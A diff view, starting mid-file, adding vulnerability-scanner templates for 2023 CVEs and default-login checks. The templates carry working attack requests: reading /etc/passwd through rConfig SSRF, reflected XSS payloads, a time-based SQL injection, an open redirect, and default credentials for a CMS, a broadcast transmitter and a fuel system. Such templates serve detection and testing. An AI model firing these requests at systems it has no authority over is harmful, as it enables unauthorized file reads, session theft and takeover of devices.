POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /lib/crud/configcompare.crud.php?path_a=file:///etc/passwd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- "rConfig"
- type: regex
part: body_3
regex:
- "root:.*:0:0:"
- type: status
status:
- 200

57
http/cves/2023/CVE-2023-39110.yaml Normal file
View File

@ -0,0 +1,57 @@
id: CVE-2023-39110
info:
name: rConfig 3.9.4 - Server-Side Request Forgery
author: theamanrawat
severity: high
description: |
rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path parameter at /ajaxGetFileByPath.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_%20ajaxGetFileByPath.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-39110
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-39110
cwe-id: CWE-918
metadata:
verified: true
shodan-query: http.title:"rConfig"
tags: cve,cve2023,rconfig,authenticated,ssrf,lfr
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
matchers-condition: and
matchers:
- type: regex
part: body_3
regex:
- "root:.*:0:0:"
- type: word
part: body_1
words:
- 'rConfig'
- type: status
part: header_3
status:
- 200

35
http/cves/2023/CVE-2023-39700.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2023-39700
info:
name: IceWarp Mail Server v10.4.5 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-39700
- https://cwe.mitre.org/data/definitions/79.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-39700
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
shodan-query: http.title:"IceWarp Server Administration"
tags: cve,cve2023,icewarp,xss,unauth
http:
- raw:
- |
GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "><img src=x onerror=confirm(document.cookie)>") && contains(body, "IceWarp")'
condition: and

49
http/cves/2023/CVE-2023-40208.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2023-40208
info:
name: Stock Ticker <= 3.23.2 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
remediation: Fixed in version 3.23.3
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3233-reflected-cross-site-scripting
- https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-3-unauth-reflected-cross-site-scripting-xss-vulnerability
- https://wordpress.org/plugins/stock-ticker/
- https://nvd.nist.gov/vuln/detail/CVE-2023-40208
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-40208
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=stockticker_load&symbols=MSFT&class=%22+onmousemove%3Dalert%28document.domain%29+
matchers-condition: and
matchers:
- type: word
part: body
words:
- "stock_ticker"
- "onmousemove=alert(document.domain)"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

38
http/cves/2023/CVE-2023-40779.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2023-40779
info:
name: IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect
author: r3Y3r53
severity: medium
description: |
An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.
reference:
- https://medium.com/@muthumohanprasath.r/open-redirection-vulnerability-on-icewarp-webclient-product-cve-2023-40779-61176503710
- https://nvd.nist.gov/vuln/detail/CVE-2023-40779
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-40779
cwe-id: CWE-601
cpe: cpe:2.3:a:icewarp:deep_castle_g2:13.0.1.2:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"IceWarp"
tags: cve,cve2023,icewarp,redirect
http:
- method: GET
path:
- "{{BaseURL}}/%5coast.pro/%2f%2e%2e"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
- type: status
status:
- 302

35
http/cves/2023/CVE-2023-4110.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2023-4110
info:
name: PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.
reference:
- http://packetstormsecurity.com/files/173926/PHPJabbers-Availability-Booking-Calendar-5.0-Cross-Site-Scripting.html
- https://vuldb.com/?id.235957
- https://nvd.nist.gov/vuln/detail/CVE-2023-4110
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4110
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:availability_booking_calendar:5.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,phpjabber,jabber
http:
- method: GET
path:
- "{{BaseURL}}/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "Booking", "Arrival", "><script>alert(document.domain)</script>")'
condition: and

35
http/cves/2023/CVE-2023-4111.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2023-4111
info:
name: PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely.
reference:
- https://vuldb.com/?id.235958
- https://packetstormsecurity.com/files/173927/PHPJabbers-Bus-Reservation-System-1.1-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-4111
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4111
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:bus_reservation_system:1.1:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,phpjabber,jabber
http:
- method: GET
path:
- "{{BaseURL}}/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id="
matchers:
- type: dsl
dsl:
- 'contains_all(body, "You have an error in your SQL syntax", "><script>alert(document.domain)</script>")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and

37
http/cves/2023/CVE-2023-4112.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2023-4112
info:
name: PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
reference:
- https://www.exploitalert.com/view-details.html?id=39750
- https://cxsecurity.com/ascii/WLB-2023080012
- http://packetstormsecurity.com/files/173930/PHPJabbers-Shuttle-Booking-Software-1.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-4112
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4112
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"PHP Jabbers.com"
tags: cve,cve2023,xss,unauth,phpjabbers
http:
- method: GET
path:
- "{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"
matchers:
- type: dsl
dsl:
- 'contains(body, "PHPJabbers") && contains(body, "><script>alert(document.domain)</script>")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and

34
http/cves/2023/CVE-2023-4113.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2023-4113
info:
name: PHPJabbers Service Booking Script 1.0 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely.
reference:
- http://packetstormsecurity.com/files/173931/PHPJabbers-Service-Booking-Script-1.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-4113
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4113
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:service_booking_script:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,php,jabbers
http:
- method: GET
path:
- "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "Select Service(s)", "><script>alert(document.domain)</script>")'
condition: and

35
http/cves/2023/CVE-2023-4114.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2023-4114
info:
name: PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
reference:
- https://www.exploitalert.com/view-details.html?id=39749
- http://packetstormsecurity.com/files/173932/PHPJabbers-Night-Club-Booking-1.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-4114
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4114
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,php,jabbers
http:
- method: GET
path:
- "{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date="
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "Drinks & Extras", "Checkout", "><script>alert(document.domain)</script>")'
condition: and

35
http/cves/2023/CVE-2023-4115.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2023-4115
info:
name: PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
reference:
- https://www.exploitalert.com/view-details.html?id=39747
- https://cxsecurity.com/ascii/WLB-2023080015
- https://nvd.nist.gov/vuln/detail/CVE-2023-4115
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4115
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:cleaning_business_software:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,phpjabber,jabber
http:
- method: GET
path:
- "{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "Enquiry summary", "><script>alert(document.domain)</script>")'
condition: and

38
http/cves/2023/CVE-2023-4116.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2023-4116
info:
name: PHPJabbers Taxi Booking 2.0 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.
reference:
- https://www.exploitalert.com/view-details.html?id=39746
- https://cxsecurity.com/ascii/WLB-2023080016
- http://packetstormsecurity.com/files/173937/PHPJabbers-Taxi-Booking-2.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-4116
- https://vuldb.com/?ctiid.235963
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4116
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:taxi_booking_script:2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"PHP Jabbers.com"
tags: cve,cve2023,xss,phpjabbers
http:
- method: GET
path:
- "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "Passengers", "Drop-off address", "><script>alert(document.domain)</script>")'
condition: and

44
http/cves/2023/CVE-2023-4148.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2023-4148
info:
name: Ditty < 3.1.25 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
remediation: Fixed in version 3.1.25
reference:
- https://wpscan.com/vulnerability/aa39de78-55b3-4237-84db-6fdf6820c58d
- https://nvd.nist.gov/vuln/detail/CVE-2023-4148
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cve-id: CVE-2023-4148
cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/ditty-news-ticker/"
tags: cve,cve2023,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=ditty&page=ditty_export&tab=export_ditty&"><script>alert(/XSS/)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<script>alert(/XSS/)</script>") && contains(body_2, "ditty")'
- 'contains(content_type_2, "text/html")'
condition: and

34
http/cves/2023/CVE-2023-41538.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2023-41538
info:
name: PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Forum-Script-3.0
- https://nvd.nist.gov/vuln/detail/CVE-2023-41538
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-41538
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,phpjabber,jabber
http:
- method: GET
path:
- "{{BaseURL}}/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "New Question", "><script>alert(document.domain)</script>")'
condition: and

34
http/cves/2023/CVE-2023-4168.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2023-4168
info:
name: Adlisting Classified Ads 2.14.0 - Information Disclosure
author: r3Y3r53
severity: high
description: |
Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.
reference:
- https://www.exploit-db.com/exploits/51667
- https://templatecookie.com/demo/adlisting-classified-ads-script
- https://nvd.nist.gov/vuln/detail/CVE-2023-4168
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-4168
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
tags: cve,cve2023,adlisting,exposure
http:
- method: GET
path:
- "{{BaseURL}}/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword="
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "google_map_key", "api_key", "auth_domain")'
condition: and

43
http/cves/2023/CVE-2023-4547.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2023-4547
info:
name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.
reference:
- https://spa-cart.com
- https://cxsecurity.com/ascii/WLB-2023080090
- https://nvd.nist.gov/vuln/detail/CVE-2023-4547
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 3.5
cve-id: CVE-2023-4547
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2023,spa-cart,unauth,xss
http:
- method: GET
path:
- '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '100-1331"><script>alert(document.cookie)</script>'
- '<table class="products-nav">'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200

36
http/cves/2023/CVE-2023-4974.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2023-4974
info:
name: Academy LMS 6.2 - SQL Injection
author: theamanrawat
severity: medium
description: |
A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
reference:
- https://demo.creativeitem.com/academy/
- https://packetstormsecurity.com/files/174681/Academy-LMS-6.2-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-4974
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
cvss-score: 6.3
cve-id: CVE-2023-4974
cwe-id: CWE-89
metadata:
verified: true
shodan-query: html:"Academy LMS"
tags: cve,cve2023,sqli,academy,lms
http:
- raw:
- |
@timeout: 20s
GET /tutor/filter?searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- duration>=7
- status_code == 500
- contains(body, "Courses</span>")
condition: and

36
http/cves/2023/CVE-2023-5244.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2023-5244
info:
name: Microweber < V.2.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.
reference:
- https://huntr.dev/bounties/a3bd58ba-ca59-4cba-85d1-799f73a76470/
- https://vuldb.com/?id.240778
- https://nvd.nist.gov/vuln/detail/CVE-2023-5244
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cve-id: CVE-2023-5244
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:780351152
tags: cve,cve2023,xss,microweber
http:
- method: GET
path:
- "{{BaseURL}}/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "alert(document.domain)", "microweber")'
condition: and

41
http/default-logins/batflat/batflat-default-login.yaml Normal file
View File

@ -0,0 +1,41 @@
id: batflat-default-login
info:
name: Batflat CMS - Default Login
author: r3Y3r53
severity: high
description: |
Batflat CMS is vulnerable to default login vulnerability that most commonly affects devices having some pre-set (default) administrative credentials to access all configuration settings.
reference:
- https://www.exploitalert.com/view-details.html?id=34749
- https://cxsecurity.com/issue/WLB-2020010100
metadata:
google-query: intext:"Powered by Batflat."
verified: true
tags: default-login,batflat
http:
- raw:
- |
POST /admin/ HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&login=
attack: pitchfork
payloads:
username:
- "admin"
password:
- "admin"
cookie-reuse: true
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Batflat - Dashboard")'
condition: and

46
http/default-logins/eurotel/etl3100-default-login.yaml Normal file
View File

@ -0,0 +1,46 @@
id: etl3100-default-login
info:
name: EuroTel ETL3100 - Default Login
author: r3Y3r53
severity: high
description: |
The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php
- https://www.exploit-db.com/exploits/51684
metadata:
max-request: 2
verified: true
shodan-query: html:"ETL3100"
fofa-query: body="ETL3100"
tags: misconfig,default-login,eurotel
http:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
txtUserId={{username}}&txtPassword={{password}}&btnLogin=Login
- |
GET /exciter.php HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
- user
- operator
password:
- etl3100rt1234
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains_all(body_2, "FM Exciter", "Summary", "/logout.php")'
condition: and

42
http/default-logins/franklin-fueling-default-login.yaml Normal file
View File

@ -0,0 +1,42 @@
id: franklin-fueling-default-login
info:
name: Franklin Fueling System Default Login - Detect
author: r3Y3r53
severity: high
description: |
A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable.
reference:
- https://www.exploitalert.com/view-details.html?id=39466
metadata:
google-query: inurl:"relay_status.html"
verified: true
max-request: 1
tags: default-login,franklin
http:
- raw:
- |
POST /21408623/cgi-bin/tsaws.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<TSA_REQUEST_LIST PASSWORD="{{password}}"><TSA_REQUEST COMMAND="cmdWebCheckRole" ROLE="{{username}}"/></TSA_REQUEST_LIST>
attack: pitchfork
payloads:
username:
- roleAdmin
- roleUser
- roleGuest
password:
- admin
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/xml")'
- 'contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")'
condition: and

Some files were not shown because too many files have changed in this diff Show More